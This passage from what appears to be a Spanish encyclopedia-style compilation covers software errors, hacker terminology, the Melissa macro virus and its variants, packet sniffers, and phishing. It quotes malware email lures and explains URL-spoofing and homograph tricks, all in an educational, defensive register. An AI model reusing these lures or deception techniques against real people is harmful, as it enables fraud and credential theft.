Códigos de errores de lenguajes de programaciónLa mayor parte de los lenguajes de programación presentan al menos dos tipos de errores que permiten a losprogramadores manejar las fallas de los programas de una manera eficiente y que no resulte agresiva con el usuariofinal. Dichos errores son de compilación y errores en tiempo de ejecución.Los errores de compilación normalmente inhiben que el código fuente derive en un programa ejecutable, mientrasque los errores en tiempo de ejecución son situaciones específicas en las que un evento externo al programa impidesu ejecución. Regularmente un programador eficiente debe intentar imaginar como debe responder ante esos eventosde manera que sea el programa y no el usuario o el sistema operativo los que resuelvan el problema. Así por ejemploun bloque de error no manejado podría hacer lo siguiente:

Abre el archivo "miarchivo" para escritura

comienza a escribir datos en mi archivo

cierra el archivo

Si "miarchivo" no existe (o el programa o el usuario no tienen privilegios suficientes para abrirlo), el sistemaoperativo regresará un error que el programa no atrapará y tendremos un mensaje como "El archivo "miarchivo" nopuede ser abierto para escritura" y botones para reintentar, cancelar y abortar (en el sistema operativo Windows), queno tendrán otra acción que repetirse indefinidamente sin posibilidad de salir de ese ciclo como no sea dando porterminado violentamente el programa. Un código que permitiese atrapar el error en tiempo de ejecución sería:

Abre el archivo "miarchivo" para escritura

Si el sistema operativo lo permite

comienza a escribir datos en "miarchivo"

si no lo permitió

informa al usuario de lo que sucede

regresa al usuario a un punto donde no haya conflicto (el menú principal, por ejemplo)

Continúa operando normalmente

Los diferentes lenguajes de programación permiten diferentes construcciones lógicas a los programadores paraatrapar y resolver errores en tiempo de ejecución, como pueden ser las sentencias assert, try y on error en diferenteslenguajes de programación.

Page 87: Virus informático

Error de software 85

Enlaces externos• Buscador de Vulnerabilidades por productos de INTECO-CERT [4]

Referencias[1] http:/ / ei. cs. vt. edu/ ~history/ Bug. GIF[2] bug (http:/ / www. catb. org/ jargon/ html/ B/ bug. html)[3] La polilla que voló dentro de un ordenador y el origen de «bug informático» | Microsiervos (Leyendas Urbanas) (http:/ / www. microsiervos.

com/ archivo/ leyendas-urbanas/ polilla-volo-en-ordenador-y-origen-leyenda-bug. html)[4] http:/ / cert. inteco. es/ vulnSearch/ Actualidad/ Actualidad_Vulnerabilidades/ buscador_vulnerabilidades

HackerEn informática, un hacker[1] o pirata informático es una persona que pertenece a una de estas comunidades osubculturas distintas pero no completamente independientes:

El emblema hacker, un proyecto para crear unsímbolo reconocible para la percepción de la

cultura hacker.

• Gente apasionada por la seguridad informática. Esto concierneprincipalmente a entradas remotas no autorizadas por medio deredes de comunicación como Internet ("Black hats"). Pero tambiénincluye a aquellos que depuran y arreglan errores en los sistemas("White hats") y a los de moral ambigua como son los "Grey hats".

• Una comunidad de entusiastas programadores y diseñadores desistemas originada en los sesenta alrededor del InstitutoTecnológico de Massachusetts (MIT), el Tech Model Railroad Club(TMRC) y el Laboratorio de Inteligencia Artificial del MIT.[2] Estacomunidad se caracteriza por el lanzamiento del movimiento desoftware libre. La World Wide Web e Internet en sí misma soncreaciones de hackers.[3] El RFC 1392[4] amplia este significadocomo "persona que se disfruta de un conocimiento profundo delfuncionamiento interno de un sistema, en particular decomputadoras y redes informáticas"

• La comunidad de aficionados a la informática doméstica, centrada en el hardware posterior a los setenta y en elsoftware (juegos de ordenador, crackeo de software, la demoscene) de entre los ochenta/noventa.

En la actualidad se usa de forma corriente para referirse mayormente a los criminales informáticos, debido a suutilización masiva por parte de los medios de comunicación desde la década de 1980. A los criminales se le puedensumar los llamados "script kiddies", gente que invade computadoras, usando programas escritos por otros, y quetiene muy poco conocimiento sobre cómo funcionan. Este uso parcialmente incorrecto se ha vuelto tan predominanteque, en general, un gran segmento de la población no es consciente de que existen diferentes significados.Mientras que los hackers aficionados reconocen los tres tipos de hackers y los hackers de la seguridad informáticaaceptan todos los usos del término, los hackers del software libre consideran la referencia a intrusión informáticacomo un uso incorrecto de la palabra, y se refieren a los que rompen los sistemas de seguridad como "crackers"(analogía de "safecracker", que en español se traduce como "un ladrón de cajas fuertes").

Page 88: Virus informático

Hacker 86

Controversia de la definición de hackerLos términos hacker y hack pueden tener connotaciones positivas y negativas. Los programadores informáticossuelen usar las palabras hacking y hacker para expresar admiración por el trabajo de un desarrollador cualificado desoporte lógico, pero también se puede utilizar en un sentido negativo para describir una solución rápida pero pocoelegante a un problema. Algunos[¿quién?] desaprueban el uso del hacking como un sinónimo de cracker, en marcadocontraste con el resto del mundo,[¿dónde?] en el que la palabra hacker se utiliza normalmente para describir a alguienque se infiltra en un sistema informático con el fin de eludir o desactivar las medidas de seguridad.

Controversia y ambigüedadEn un principio se utilizaba "hack" como verbo para expresar "perder el tiempo" (e.j. "Puedo hackear con elordenador"), el significado del término ha cambiado a lo largo de décadas desde que empezó a utilizarse en uncontexto informático. Como su uso se ha extendido más ampliamente, el significado primario de la palabra, por partede los nuevos usuarios, ha pasado a uno que entra en conflicto con el énfasis original.

Activismo

En un sentido amplio el termino Hacker oHacking se puede asociar a movimientos sociales

que promueven cambios en los modos de vida.

Desde el año 2002-2003, se ha ido configurando una perspectiva másamplia del hacker, pero con una orientación a su integración alhacktivismo en tanto movimiento. Aparecen espacios autónomosdenominados hacklab o hackerspace y los hackmeeting comoinstancias de diálogo de hackers. Desde esta perspectiva, se entiende alhacker como una persona que es parte de una conciencia colectiva quepromueve la libertad del conocimiento y la justicia social.

En este caso, los roles de un hacker pueden entenderse en cuatroaspectos:•• Apoyar procesos de apropiación social o comunitaria de las

tecnologías.• Poner a disposición del dominio público el manejo técnico y destrezas alcanzadas personal o grupalmente.• Crear nuevos sistemas, herramientas y aplicaciones técnicas y tecnológicas para ponerlas a disposición del

dominio público.• Realizar acciones de hacktivismo tecnológico con el fin de liberar espacios y defender el conocimiento común, o

mancomunal

Terminología

White hat y black hatUn hacker de sombrero blanco (del inglés, White hats), en jerga informática, se refiere a una ética hacker que secentra en asegurar y proteger los sistemas de Tecnologías de información y comunicación.[5] Estas personas suelentrabajar para empresas de seguridad informática las cuales los denominan, en ocasiones, «zapatillas o equipostigre».[6]

Por el contrario, un hacker de sombrero negro (del inglés, Black Hat) es el villano o chico malo, especialmente enuna película de western, de ahí que en tal carácter se use un sombrero negro, en contraste con el héroe, el desombrero blanco.También conocidos como "crackers" muestran sus habilidades en informática rompiendo sistemas de seguridad de computadoras, colapsando servidores, entrando a zonas restringidas, infectando redes o apoderándose de ellas, entre

Page 89: Virus informático

Hacker 87

otras muchas cosas utilizando sus destrezas en métodos hacking.En los últimos años, los términos sombrero blanco y un sombrero negro han sido aplicados a la industria delposicionamiento en buscadores (Search Engine Optimization, SEO). Las tácticas de posicionamiento en buscadoresde los hackers de sombrero negro, también llamada spamdexing, intento de redireccionar los resultados de labúsqueda a páginas de destino particular, son una moda que está en contra de los términos de servicio de los motoresde búsqueda, mientras que los hackers de sombrero blanco, utilizan métodos que son generalmente aprobados porlos motores de búsqueda.

SamuráiNormalmente es alguien contratado para investigar fallos de seguridad, que investiga casos de derechos deprivacidad, esté amparado por la primera enmienda estadounidense o cualquier otra razón de peso que legitimeacciones semejantes. Los samuráis desdeñan a los crackers y a todo tipo de vándalos electrónicos. También sededican a hacer y decir cómo saber sobre la seguridad con sistemas en redes[7]

PhreakerDe phone freak ("monstruo telefónico"). Son personas con conocimientos amplios tanto en teléfonos modulares(TM) como en teléfonos móviles.

WannabeGeneralmente son aquellos a los que les interesa el tema de hacking y/o phreaking pero que por estar empezando noson reconocidos por la elite. Son aquellos que si perseveran aprendiendo y estudiando, pueden llegar a convertirseperfectamente en hackers. No por ser novato es repudiado, al igual que tampoco hay que confundirlo con un lammer.

Lammer o script-kiddieEs un término coloquial inglés aplicado a una persona falta de habilidades técnicas, generalmente no competente enla materia, que pretende obtener beneficio del hacking sin tener los conocimientos necesarios. Su alcance se basa ena buscar y descargar programas y herramientas de intrusión informática, cibervandalismo, propagación de softwaremalicioso para luego ejecutarlo como simple usuario, sin preocuparse del funcionamiento interno de éstos ni de lossistemas sobre los que funcionan. En muchos casos presume de conocimientos o habilidades que no posee.

NewbieNewbie es un término utilizado comúnmente en comunidades en línea para describir a un novato, en esta área, es elque no posee muchos conocimientos en el tema.

En la cultura popular• La trama de la novela "La piel del tambor" de Arturo Pérez-Reverte gira en torno a un misterioso pirata

informáticos.

Referencias[2] http:/ / www. catb. org/ ~esr/ writings/ cathedral-bazaar/ hacker-history/ ar01s02. html[5] ¿Qué es sombrero blanco? - una definición de Whatis.com (en inglés) (http:/ / searchsecurity. techtarget. com/ sDefinition/

0,,sid14_gci550882,00. html)[6] tiger team (en inglés) (http:/ / www. catb. org/ jargon/ html/ T/ tiger-team. html)

Page 90: Virus informático

Hacker 88

Enlaces externos• Definición de hacker en el Jargon File (http:/ / www. catb. org/ jargon/ html/ H/ hacker. html) (inglés)

Melissa (informática)Melissa es un virus macro que infecta documentos de Microsoft Office. También conocido como "W97M","Simpsons" (en referencia a los dibujos animados estadounidenses), "Kwyjibo" ó "Kwejeebo", (en referencia a BartSimpson cuando juega a poner esta palabra imaginaria en el Scrabble y debido a que en el código del virus dice“written by Kwyjibo”).

HistoriaEl 26 de marzo de 1999 y en apenas unos días, protagonizó uno de los casos de infección masiva más importantes dela historia de los virus informáticos. De hecho, compañías como Microsoft, Intel o Lucent Technologies tuvieron quebloquear sus conexiones a Internet debido a la acción de Melissa.[1]

Melissa se distribuyó por primera vez en la discusión del grupo de noticias Usenet:alt.sex. El virus estaba dentro deun archivo llamado "List.doc", que decía contener una lista de contraseña con las que se permitia el acceso a 80 sitiosweb pornográficos. La forma original del virus fue enviada por e-mail a muchas personas.

AutorMelissa fue creado por David L. Smith de Aberdeen, Nueva Jersey. Él reconoció en su declaración de culpabilidadque el virus melissa causó más de 80 millones de dólares en daños a las empresas norteamericanas.[2]

"Yo no esperaba ni anticipar la cantidad de daño que tuvo lugar, cuando publiqué el virus, que esperaba que elperjuicio económico sería menor e incidental", dijo Smith.El virus lo creó en memoria de una bailarina topless de Florida de la cual se había enamorado.Smith fue condenado a 10 años de prisión, pasando 20 meses en prisión y multado con 5.000 dólares.Smith posteriormente colaboraría para ayudar al FBI en la búsqueda de Jan de Wit, el creador holandés del virusinformático Anna Kournikova.[3]

Especificaciones del virusMelissa se puede propagar en los procesadores de textos Microsoft Word 97 y Word 2000 y Microsoft Excel 97,2000 y 2003. Se puede enviar así mismo por correo electrónico desde Microsoft Outlook 97 o 98, enviándolo a losprimeros 50 contactos de la libreta de direcciones en un email que marca.[4]

Versión del virus[5] [6][7] [8] [9] [10] [11]

Melissa A

From: (nombre del usuario infectado)

*Asunto: Importante Mensaje de "Nombre del remitente

To: (50 nombres de la agenda)Texto del Mensaje: Aquí está ese documento que usted solicitó... no mostrar a nadie;-)

Archivo adjunto: LIST.DOC

Page 91: Virus informático

Melissa (informática) 89

Que es un documento de Word que contiene el virus, que si se descarga y se abre, a continuación, la macro deldocumento se ejecuta e inician los intentos de envíos masivos de sí mismo a las 50 personas de la libreta dedirecciones del correo electrónico, con ello multiplicándose, y al ser infectado escribe en los documentos que setengan abiertos:“Veintidós puntos, más triple puntuación de palabras, más cincuenta puntos por usar todas mis cartas. El juegotermina. Me voy de aquí”Cuando se abre el archivo de Word, se infecta la plantilla de documentos normal.dot, infectando a partir de ellotodos los documentos de Word.Esto ocurre cuando el minutero del reloj coincide con el día del mes.

Melissa AD WM97

Virus de macros y Gusano de Internet.Se envía por correo a las primeras 150 direcciones de e-mail, de la agenda del Outlook.Crea tres archivos en el directorio raíz, el CMOS.COM, FAT32.COM y DRIVES.BAT.El archivo DRIVES.BAT se ejecuta al reinicio del equipo al correr el AUTOEXEC.BAT, el cuál es modificado paraello, e intenta borrar todos los datos en los discos D: y los otros existentes.El virus cambia la fecha de la computadora.

Melissa AM

Si se tienen más de 10 nombres en su libreta de direcciones en el Outlook, el virus se reenviará a si mismo vía e-maila un total de 30 o 60 % de estos contactos. Estos mensajes serán enviados aleatoriamente con los atributos deprioridades Baja, Normal o Alta.*Asunto: Se genera al azar construyéndose una frase con una serie de palabras como: Hello!, Hi!, Here, I think this,Gee...Guess this, is, used to be, are, that, the, your, file, document, .doc, you requested, they askedEsto puede generar:*Asuntos como: ¡Hola! Creo que esto solía ser el documento que ha solicitado.

¡Hola! Vaya ... Supongo que esto es el archivo que pidió ".

Adjunto al mensaje se incluye un documento Word infectado.WM97/Melissa AM también envía información del sistema infectado, incluyendo datos como nombre de usuario,zona horaria, nombre del usuario registrado, etc., a ciertas direcciones de correo electrónico. Se supone que la ideadel autor es recabar con esto una base de datos de los usuarios infectados.

Melissa AO

En equipos que cuentan con Outlook, enviar e-mail con:*Asunto: Muy URGENTE: a todos los usuarios de correo electrónico – Mensaje: Este anuncio es para todos losusuario de correo electrónico. Por favor, tenga en cuenta que nuestro servidor de correo electrónico se cayó y serecomienda que lea el documento que se adjunta con este e-mail.

Melissa B

Es una variante que solo tiene activa su parte de gusano. En su código, en el campo de comentario del autor deldocumento, se lee: No queremos infectar su PC; solo avisarle*Asunto: No confíes en nadie.Mensaje: Ten cuidado con lo que abres, podría ser un virus.

Page 92: Virus informático

Melissa (informática) 90

Archivo adjunto: Cuando el documento es abierto, el gusano comprueba el registro del sistema buscando rastros del"Melissa.a", y si no está presente, envía un mensaje con una copia del documento infectado , Con el texto: Estopodría haber tenido resultados desastrosos. Ten más cuidado la próxima vez que se abre un e-mail. Protéjase a símismo! Descubra cómo en estos sitios web: Y anexa algunas ligas a sitios Web.

Melissa I

Esta versión del virus, sortea aleatoriamente el asunto y el mensaje de entre estas ocho posibilidades en Ingles.1. *Asunto: 80mb gratis de espacio Web!

Mensaje: Echa un vistazo al documento adjunto para más detalles sobre cómo obtener el espacio libre. Está bien,ahora tengo un montón de espacio.

2. *Asunto: ¡Checa esto!

Mensaje: Esto es un poco de material malvado!

3.*Asunto: Sitios Cool .Mensaje: Echa un vistazo al documento adjunto para obtener una lista de algunos de los mejores sitios en la Web.4. *Asunto: * Descargas Gratis .Mensaje: Aquí está una lista de sitios, donde se puede obtener descargas gratuitas. (El asterisco se sustituye con uncarácter aleatorio). ‘‘5. *Asunto: Hardware barato.Mensaje: He adjuntado una lista de sitios web donde se puede obtener Hardware barato”6. *Asunto: Música gratis.Mensaje: Aquí está una lista de lugares donde se puede obtener música gratis.

7. *Asunto: Pregunta para usted ...

Mensaje: Es bastante complicado así que lo he conectado.8. *Asunto: Software barato.Mensaje: El documento adjunto contiene una lista de sitios web donde se puede obtener software baratoArchivo adjunto: ‘‘‘ El virus Melissa I, utiliza una clave de registro llamada "empírica", para comprobar quese ha hecho el envío de correo masivo.

Si el número de minutos es igual al número de horas, (ejemplos 8:8 A.M., 10:10 A.M.) El virus inserta el texto, en eldocumento activo:Todos los imperios caen, sólo tienes que saber dónde presionar.

Melissa O, W97M.Melissa AA, W97M.Duhalde, W97M.Melissa Variant.

Variante modificada que emplean capacidades heurísticas, para evitar que los antivirus lo detecten.Este virus contiene referencias a la elección presidencial del 9 de abril de 2000, en el Perú.Se trata de un virus de MACRO que es capaz de transmitirse por correo electrónico automáticamente de un usuario aotro y que podría transmitir información confidencial desde la computadora infectada sin que se de cuenta el usuario.Contiene 2 rutinas maliciosas (payloads), dependiendo de si se usa Office 97 ó 2000, con lo que desactivará laopción de Seguridad en Macros del menú Herramientas.Modifica el registro de Windows, de este modo para saber que ya se ha enviado y así no volver a hacerlo en eseequipo. Dicha marca es la entrada:HKEY_CURRENT_USER\Software\Microsoft\Office\ x?" con valor "y". Elecciones2000 = Pacocha :-PTambién modifica la plantilla Normal.DOT, con lo que se infecta a partir de que se guarde el documento en Word.

Page 93: Virus informático

Melissa (informática) 91

El correo electrónico tiene el siguiente aspecto:*Asunto: Presidente Duhalde

Mensaje: Programa de Gobierno 1999 - 2004.

Archivo adjunto:AVISEN A LOS QUE PUEDAN

Me acaban de avisar que ha aparecido un virus que se envía por correo bajo el titulo de ELECCIONES 2000ULTIMAS ENCUESTAS DE APOYO. Cuando lo abren se borra el disco duro. Por favor reenvíen este correo a susamigos para alertarles al respecto. Dígales que los borren sin abrirlos.Si se tiene abierto un documento y los minutos del reloj más uno coinciden con el día, se inserta un espacio enblanco en el texto en donde esta el cursor.

Melissa Papa

El "Papa" está basado en el mismo código del "Melissa", infecta únicamente archivos de Excel 97. Utiliza también elMicrosoft Outlook para sus envíos.Sin embargo, por su método de infección, puede considerarse un gusano.El código de este gusano(worm) contiene un procedimiento que abre e infecta cualquier libro de trabajo de Excel.Utiliza lenguaje Visual Basic, envía sus propias copias vía e-mail, del Outlook, a cada una de las primeras 60direcciones de la libreta de direcciones:*Asunto: Fwd: Libro de trabajo de todos. Net y Fred Cohen

Texto:Contiene información urgente. No le preste atención a advertencias de macros

Al mensaje se adjunta un archivo de Excel infectado.Aleatoriamente en su numero de envíos, el gusano inunda con mensajes el sitio Web de "Fred Cohen & Associates"ó una IP especifica.

Melissa U (gen1)

Actúa en las versiones Word 97 o Word 2000.El archivo adjunto: Se descarga como un archivo corrupto o defectuoso por lo que los antivirus lo ignoran y almomento de ser ejecutado lo reacomoda haciéndolo válido.Al ser abierto, el virus se activa y empieza a borrar archivos importantes de sistema como son: • c: \ command.com •c: \ IO.SYS • c: \ Ntdetect.com • c: \ Suhdlog.dat • d: \ command.com • d: \ IO.SYS • D: \ Suhdlog.datPara posteriormente envía automáticamente los correos electrónicos, a través de las listas de direcciones del correoelectrónico, de los que reciben el correo infectado.

Melissa V

Esta variante es similar a Melissa.U. Se envía a 40 direcciones de e-mail.Mensaje::Tema: Mis imágenes (nombre de usuario) El mensaje está vacío, y (nombre de usuario) se sustituye con elnombre del usuario registrado en Word.Se eliminarán todos los archivos de la raíz de las diferentes unidades del equipo, Después de que Melissa.V se haenviado por correo.

Page 94: Virus informático

Melissa (informática) 92

Melissa W

Se activa la carga útil a las 10 horas del día 10 de cada mes, cuando el virus inserta el siguiente texto en eldocumento abierto:worm! Vamos que nos gusta.

PrevencionesContar con un antivirus actualizado.No hay que reenviar estos mensajes nunca.

Referencias

Analizador de paquetesEn informática, un analizador de paquetes es un programa de captura de las tramas de una red de computadoras.Es algo común que, por topología de red y necesidad material, el medio de transmisión (cable coaxial, cable de partrenzado, fibra óptica, etc.) sea compartido por varias computadoras y dispositivos de red, lo que hace posible que unordenador capture las tramas de información no destinadas a él. Para conseguir esto el analizador pone la tarjeta dered en un estado conocido como "modo promiscuo" en el cual en la capa de enlace de datos no son descartadas lastramas no destinadas a la dirección MAC de la tarjeta; de esta manera se puede capturar (sniff, "olfatear") todo eltráfico que viaja por la red.Los analizadores de paquetes tienen diversos usos, como monitorear redes para detectar y analizar fallos, o pararealizar ingeniería inversa en protocolos de red. También es habitual su uso para fines maliciosos, como robarcontraseñas, interceptar correos electrónicos, espiar conversaciones de chat, etc.

Topología de redes y analizadores de paquetesLa cantidad de tramas que puede obtener un analizador depende de la topología de red, del modo donde estéinstalado y del medio de transmisión. Por ejemplo:•• Para redes antiguas con topologías en estrella, el analizador se podría instalar en cualquier nodo, ya que lo que

hace el nodo central es retransmitir todo lo que recibe a todos los nodos. Sin embargo en las redes modernas, enlas que solo lo retransmite al nodo destino, el único lugar donde se podría poner el analizador para que capturaratodas las tramas sería el nodo central.

•• Para topologías en anillo, doble anillo y en bus, el analizador se podría instalar en cualquier nodo, ya que todostienen acceso al medio de transmisión compartido.

• Para las topologías en árbol, el nodo con acceso a más tramas sería el nodo raíz, aunque con los conmutadoresmás modernos, las tramas entre niveles inferiores de un nodo viajarían directamente y no se propagarían al nodoraíz.

Es importante remarcar el hecho de que los analizadores sólo tienen efecto en redes que comparten el medio detransmisión como en redes sobre cable coaxial, cables de par trenzado o redes Wi-Fi.El uso de conmutadores en lugar de concentradores incrementa la seguridad de la red ya que limita el uso deanalizadores al dirigirse las tramas únicamente a sus correspondientes destinatarios.

Page 95: Virus informático

Analizador de paquetes 93

UtilidadLos principales usos que se le pueden dar son:• Captura automática de contraseñas enviadas en claro y nombres de usuario de la red. Esta capacidad es utilizada

en muchas ocasiones por crackers para atacar sistemas a posteriori.•• Conversión del tráfico de red en un formato inteligible por los humanos.•• Análisis de fallos para descubrir problemas en la red, tales como: ¿por qué el ordenador A no puede establecer

una comunicación con el ordenador B?•• Medición del tráfico, mediante el cual es posible descubrir cuellos de botella en algún lugar de la red.• Detección de intrusos, con el fin de descubrir hackers. Aunque para ello existen programas específicos llamados

IDS (Intrusion Detection System, Sistema de Detección de intrusos), estos son prácticamente analizadores confuncionalidades específicas.

• Creación de registros de red, de modo que los hackers no puedan detectar que están siendo investigados.• Para los desarrolladores, en aplicaciones cliente-servidor. Les permite analizar la información real que se

transmite por la red.

Enlaces externos• ¿Que es un sniffer? [1]

Referencias[1] http:/ / www. mundocisco. com/ 2009/ 08/ que-es-un-sniffer. html

Phishing

Éste es un ejemplo de un intento de phishing. Haciéndose pasar por un correoelectrónico oficial, trata de engañar a los clientes del banco para que deninformación acerca de su cuenta con un enlace a la página del phisher.

Phishing es un término informático quedenomina un tipo de delito encuadrado dentrodel ámbito de las estafas cibernéticas, y que secomete mediante el uso de un tipo de ingenieríasocial caracterizado por intentar adquiririnformación confidencial de forma fraudulenta(como puede ser una contraseña o informacióndetallada sobre tarjetas de crédito u otrainformación bancaria). El estafador, conocidocomo phisher, se hace pasar por una persona oempresa de confianza en una aparentecomunicación oficial electrónica, por lo comúnun correo electrónico, o algún sistema demensajería instantánea[1] o incluso utilizandotambién llamadas telefónicas.[2]

Dado el creciente número de denuncias deincidentes relacionados con el phishing, se requieren métodos adicionales de protección. Se han realizado intentoscon leyes que castigan la práctica y campañas para prevenir a los usuarios con la aplicación de medidas técnicas a losprogramas.

Page 96: Virus informático

Phishing 94

Historia del phishing

Origen del términoEl término phishing proviene de la palabra inglesa "fishing" (pesca), haciendo alusión al intento de hacer que losusuarios "muerdan el anzuelo".[3] A quien lo practica se le llama phisher.[4] También se dice que el término phishinges la contracción de password harvesting fishing (cosecha y pesca de contraseñas), aunque esto probablemente es unacrónimo retroactivo, dado que la escritura 'ph es comúnmente utilizada por hackers para sustituir la f, como raíz dela antigua forma de hacking telefónico conocida como phreaking.[5]

La primera mención del término phishing data de enero de 1996. Se dio en el grupo de noticias de hackersalt.2600,[6] aunque es posible que el término ya hubiera aparecido anteriormente en la edición impresa del boletín denoticias hacker 2600 Magazine.[7] El término phishing fue adoptado por quienes intentaban "pescar" cuentas demiembros de AOL.

Phishing en AOLQuienes comenzaron a hacer phishing en AOL durante los años 1990 solían obtener cuentas para usar los serviciosde esa compañía a través de números de tarjetas de crédito válidos, generados utilizando algoritmos para tal efecto.Estas cuentas de acceso a AOL podían durar semanas e incluso meses. En 1995 AOL tomó medidas para prevenireste uso fraudulento de sus servicios, de modo que los crackers recurrieron al phishing para obtener cuentaslegítimas en AOL.El phishing en AOL estaba estrechamente relacionado con la comunidad de warez que intercambiaba softwarefalsificado. Un cracker se hacía pasar como un empleado de AOL y enviaba un mensaje instantáneo a una víctimapotencial. Para poder engañar a la víctima de modo que diera información confidencial,[8] el mensaje podía contenertextos como "verificando cuenta" o "confirmando información de factura". Una vez el usuario enviaba su contraseña,el atacante podía tener acceso a la cuenta de la víctima y utilizarla para varios propósitos criminales, incluyendo elspam. Tanto el phishing como el warezing en AOL requerían generalmente el uso de programas escritos porcrackers, como el AOLHell.En 1997 AOL reforzó su política respecto al phishing y los warez fueron terminantemente expulsados de losservidores de AOL. Durante ese tiempo el phishing era tan frecuente en AOL que decidieron añadir en su sistema demensajería instantánea, una línea de texto que indicaba: «no one working at AOL will ask for your password orbilling information» («nadie que trabaje en AOL le pedirá a usted su contraseña o información de facturación»).Simultáneamente AOL desarrolló un sistema que desactivaba de forma automática una cuenta involucrada enphishing, normalmente antes de que la víctima pudiera responder. Los phishers se trasladaron de forma temporal alsistema de mensajería instantáneo de AOL (AIM), debido a que no podían ser expulsados del servidor de AIM. Elcierre obligado de la escena de warez en AOL causó que muchos phishers dejaran el servicio, y en consecuencia lapráctica.[9]

Intentos recientes de phishingLos intentos más recientes de phishing han tomado como objetivo a clientes de bancos y servicios de pago en línea. Aunque el ejemplo que se muestra en la primera imagen es enviado por phishers de forma indiscriminada con la esperanza de encontrar a un cliente de dicho banco o servicio, estudios recientes muestran que los phishers en un principio son capaces de establecer con qué banco una posible víctima tiene relación, y de ese modo enviar un correo electrónico, falseado apropiadamente, a la posible víctima.[10] En términos generales, esta variante hacia objetivos específicos en el phishing se ha denominado spear phishing (literalmente pesca con arpón). Los sitios de Internet con fines sociales también se han convertido en objetivos para los phishers, dado que mucha de la información provista en estos sitios puede ser utilizada en el robo de identidad.[11] Algunos experimentos han otorgado una tasa de éxito de un 90% en ataques phishing en redes sociales.[12] A finales de 2006 un gusano informático se apropió de

Page 97: Virus informático

Phishing 95

algunas páginas del sitio web MySpace logrando redireccionar los enlaces de modo que apuntaran a una página webdiseñada para robar información de ingreso de los usuarios.[13]

Técnicas de phishingLa mayoría de los métodos de phishing utilizan la manipulación en el diseño de el correo electrónico para lograr queun enlace parezca una ruta legítima de la organización por la cual se hace pasar el impostor. URLs manipuladas, o eluso de subdominios, son trucos comúnmente usados por phishers; por ejemplo en esta URL:http://www.nombredetubanco.com/ejemplo, en la cual el texto mostrado en la pantalla no correspondecon la dirección real a la cual conduce. Otro ejemplo para disfrazar enlaces es el de utilizar direcciones quecontengan el carácter arroba: @, para posteriormente preguntar el nombre de usuario y contraseña (contrario a losestándares[14]). Por ejemplo, el enlace http://[email protected]/ puede engañara un observador casual y hacerlo creer que el enlace va a abrir en la página de www.google.com, cuandorealmente el enlace envía al navegador a la página de members.tripod.com (y al intentar entrar con el nombrede usuario de www.google.com, si no existe tal usuario, la página abrirá normalmente). Este método ha sidoerradicado desde entonces en los navegadores de Mozilla[15] e Internet Explorer.[16] Otros intentos de phishingutilizan comandos en JavaScripts para alterar la barra de direcciones. Esto se hace poniendo una imagen de la URLde la entidad legítima sobre la barra de direcciones, o cerrando la barra de direcciones original y abriendo una nuevaque contiene la URL ilegítima.En otro método popular de phishing, el atacante utiliza contra la víctima el propio código de programa del banco oservicio por el cual se hace pasar. Este tipo de ataque resulta particularmente problemático, ya que dirige al usuario ainiciar sesión en la propia página del banco o servicio, donde la URL y los certificados de seguridad parecencorrectos. En este método de ataque (conocido como Cross Site Scripting) los usuarios reciben un mensaje diciendoque tienen que "verificar" sus cuentas, seguido por un enlace que parece la página web auténtica; en realidad, elenlace está modificado para realizar este ataque, además es muy difícil de detectar si no se tienen los conocimientosnecesarios.Otro problema con las URL es el relacionado con el manejo de Nombre de dominio internacionalizado (IDN) en losnavegadores, puesto que puede ser que direcciones que resulten idénticas a la vista puedan conducir a diferentessitios (por ejemplo dominio.com se ve similar a dοminiο.com, aunque en el segundo las letras "o" hayan sidoreemplazadas por la correspondiente letra griega ómicron, "ο"). Al usar esta técnica es posible dirigir a los usuarios apáginas web con malas intenciones. A pesar de la publicidad que se ha dado acerca de este defecto, conocido comoIDN spoofing[17] o ataques homógrafos,[18] ningún ataque conocido de phishing lo ha utilizado.

Lavado de dinero producto del phishing

Actualmente empresas ficticias intentan reclutar teletrabajadores por medio de correo electrónicos, chats, irc y otrosmedios, ofreciéndoles no sólo trabajar desde casa sino también otros jugosos beneficios. Aquellas personas queaceptan la oferta se convierten automáticamente en víctimas que incurren en un grave delito sin saberlo: el blanqueode dinero obtenido a través del acto fraudulento de phishing.Para que una persona pueda darse de alta con esta clase de «empresas» debe rellenar un formulario en el cualindicará, entre otros datos, su número de cuenta bancaria. Esto tiene la finalidad de ingresar en la cuenta deltrabajador-víctima el dinero procedente de estafas bancarias realizadas por el método de phishing. Una vezcontratada, la víctima se convierte automáticamente en lo que se conoce vulgarmente como mulero.Con cada acto fraudulento de phishing la víctima recibe el cuantioso ingreso en su cuenta bancaria y la empresa lenotifica del hecho. Una vez recibido este ingreso, la víctima se quedará un porcentaje del dinero total, pudiendorondar el 10%-20%, como comisión de trabajo y el resto lo reenviará a través de sistemas de envío de dinero acuentas indicadas por la seudo-empresa.

Page 98: Virus informático

Phishing 96

Dado el desconocimiento de la víctima (muchas veces motivado por la necesidad económica) ésta se ve involucradaen un acto de estafa importante, pudiendo ser requerido por la justicia previa denuncia de los bancos. Estasdenuncias se suelen resolver con la imposición de devolver todo el dinero sustraído a la víctima, obviando que esteúnicamente recibió una comisión.

Fases

• En la primera fase, la red de estafadores se nutre de usuarios de chat, foros o correos electrónicos, a través demensajes de ofertas de empleo con una gran rentabilidad o disposición de dinero (hoax o scam). En el caso de quecaigan en la trampa, los presuntos intermediarios de la estafa, deben rellenar determinados campos, tales como:Datos personales y número de cuenta bancaria.

• Se comete el phishing, ya sea el envío global de millones de correos electrónicos bajo la apariencia de entidadesbancarias, solicitando las claves de la cuenta bancaria (phishing) o con ataques específicos.

•• El tercer paso consiste en que los estafadores comienzan a retirar sumas importantes de dinero, las cuales sontransmitidas a las cuentas de los intermediarios (muleros).

• Los intermediarios realizan el traspaso a las cuentas de los estafadores, llevándose éstos las cantidades de dinero yaquéllos —los intermediarios— el porcentaje de la comisión.

Daños causados por el phishing

Una gráfica muestra el incremento en los reportes de phishing desde octubre de 2004hasta junio de 2005.

Los daños causados por el phishingoscilan entre la pérdida del acceso alcorreo electrónico a pérdidaseconómicas sustanciales. Este tipo derobo de identidad se está haciendocada vez más popular por la facilidadcon que personas confiadasnormalmente revelan informaciónpersonal a los phishers, incluyendonúmeros de tarjetas de crédito ynúmeros de seguridad social. Una vezesta información es adquirida, losphishers pueden usar datos personalespara crear cuentas falsas utilizando elnombre de la víctima, gastar el créditode la víctima, o incluso impedir a lasvíctimas acceder a sus propias cuentas.

